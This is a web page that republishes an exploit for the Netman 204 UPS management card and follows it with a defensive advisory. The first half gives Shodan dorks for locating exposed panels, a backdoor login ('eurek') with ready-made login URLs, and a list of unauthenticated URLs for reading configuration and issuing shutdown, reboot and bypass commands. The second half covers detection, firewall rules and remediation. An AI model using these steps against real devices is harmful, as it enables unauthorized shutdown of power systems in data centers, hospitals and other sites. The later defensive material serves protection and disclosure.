Netman 204 - Remote command without authentication

Exploit Author: Parsa Rezaie Khiabanloo Analysis Author: www.bubbleslearn.ir Category: Language: Unknown Published Date: 2025-04-11 
# Exploit Title: Netman 204 - Remote command with out authentication
# Date: 2/4/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux

Step 1 : Attacker can using these dorks then can find the UPS panel .

Shodan :   http.favicon.hash:22913038  OR  https://www.shodan.io/search?query=netman+204+cgi-bin

# We Found Two panel  Yellow and blue 

Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands  and burpsuite repeater to see the details of the ups .

Yellow Panel : username and password : eurek

Some exploits for that :

http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

Due to flaws in parameter validation, the URL can be shortened to:

http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek


Blue Panel : username and password : admin

Some Critical leaks without authentication we can see : 

http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html

#With using up paths we can see the details of the UPS without authentication .

First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :) 

Some Remote commands without authentication : 

http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery


Netman 204 — Remote Command Access without Proper Authentication: Overview, Risks, and Mitigations

Background

Netman 204 is a network management card commonly used with UPS (uninterruptible power supply) systems to provide web-based monitoring and remote control. Several deployments expose its web management functions on the corporate or public network. When authentication or authorization controls are missing or misconfigured, attackers can view sensitive device information and potentially issue commands that affect availability.

Vulnerability summary (high level)

  • Class: Authentication/authorization bypass and insecure web management.
  • Root cause: Management pages and command endpoints that do not enforce proper authentication and allow sensitive operations to be invoked remotely.
  • Potential outcomes: Disclosure of system configuration and operational data, and the ability to issue disruptive commands (reboot/shutdown or mode changes) that impact availability.

Why this matters

UPS systems are part of critical infrastructure in data centers, hospitals, telecommunication sites, and industrial facilities. If an attacker can access management functions without proper authentication, they can cause outages, interfere with graceful shutdowns, or otherwise disrupt operations that depend on uninterrupted power.

Typical causes and contributing factors

  • Exposed management interfaces on publicly routable networks.
  • Default or undocumented accounts and weak authentication practices.
  • Web UI endpoints that assume security is provided by network location rather than application-level checks.
  • Lack of firmware updates or vendor-supplied security fixes.

Detection: what to look for

Detection focuses on unusual access to management pages and unexpected execution of administrative operations. Examples of useful indicators include:

  • HTTP requests to management or configuration pages coming from unfamiliar external IPs.
  • Repeated or systematic scans of web-management endpoints from the same source.
  • Logs showing administrative actions outside maintenance windows (reboots, shutdowns, firmware uploads).
  • Alerts from network monitoring that management ports (HTTP/HTTPS, SNMP, proprietary ports) are accessible from the internet.

Practical defensive detections (examples)

/* Example Splunk-style search to find access to management-related pages */index=web_access "GET" ("administration" OR "configuration" OR "system-overview") | stats count by src_ip, uri, _time

Explanation: This query looks for HTTP GET requests to URIs likely associated with device management. It groups hits by source IP and resource to help identify suspicious scanning or access patterns.

Immediate mitigations (quick wins)

  • Isolate the management interface: move UPS management cards to a dedicated management VLAN or behind a bastion host or VPN.
  • Restrict access with ACLs or firewall rules so only trusted subnets and management workstations can reach device web UIs.
  • Disable unused services (HTTP if HTTPS available), and turn off remote management if not required.
  • Change default credentials and remove undocumented/backdoor accounts; enforce strong, unique passwords.
  • Apply vendor firmware updates and security patches as soon as they are validated and available.

Example network-level restriction (defensive)

# Example iptables rules to restrict access to management web ports to a trusted management subnet
iptables -A INPUT -p tcp --dport 80 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

Explanation: The sample rules allow HTTP/HTTPS only from a trusted management subnet (10.0.0.0/24) and drop other attempts. Replace subnets/ports with values that match your environment. This is a defensive control to reduce remote exposure.

Longer-term remediation and hardening

  • Apply vendor firmware fixes and verify signatures or checksums before installing updates.
  • Harden web interfaces: require strong authentication, implement session management and proper authorization checks for all administrative actions.
  • Use HTTPS with a valid certificate and disable insecure ciphers and cleartext protocols.
  • Implement network segmentation: place devices in a management network inaccessible from the internet or general-purpose LANs.
  • Enable logging and forward logs to a centralized SIEM; retain logs for forensic analysis.
  • Consider multi-factor authentication or jump-host requirements for administrative access where supported.

Incident response: if a device is suspected compromised

  • Isolate the device from the network to prevent further remote actions.
  • Preserve logs and take forensic images of the device’s configuration and storage.
  • Collect evidence of commands executed and the source IP addresses involved.
  • Reset credentials, remove unknown accounts, and perform a secure firmware reflash using vendor-provided images.
  • Coordinate with the device vendor for guidance and to determine whether a backdoor or persistent compromise exists.
  • Notify affected stakeholders and follow regulatory or organizational disclosure policies where applicable.

Responsible disclosure and coordination

If you discover a vulnerability in a vendor product, report it through the vendor’s security contact or vulnerability disclosure program. Coordinate with the vendor to ensure patches are developed and communicated. If the issue has broad impact, coordinating with CERTs or national vulnerability agencies can help manage public notifications and mitigations.

Risk assessment and operational considerations

When evaluating the risk of exposed UPS management interfaces, consider:

  • Business impact of an outage or degraded UPS behavior.
  • Connectivity exposure (public vs. private network).
  • Availability of alternative power management controls and failover arrangements.
Risk Likelihood Recommended action
Unauthorized remote management commands High if management UI is publicly reachable Isolate, apply ACLs, patch firmware, enforce strong auth
Information disclosure (UPS config & status) Medium Restrict access, enable logging, rotate credentials

References and further reading

  • Vendor documentation and firmware download pages — check the manufacturer’s site for the latest security advisories and firmware.
  • General device hardening guidance from infrastructure and OT security best practices.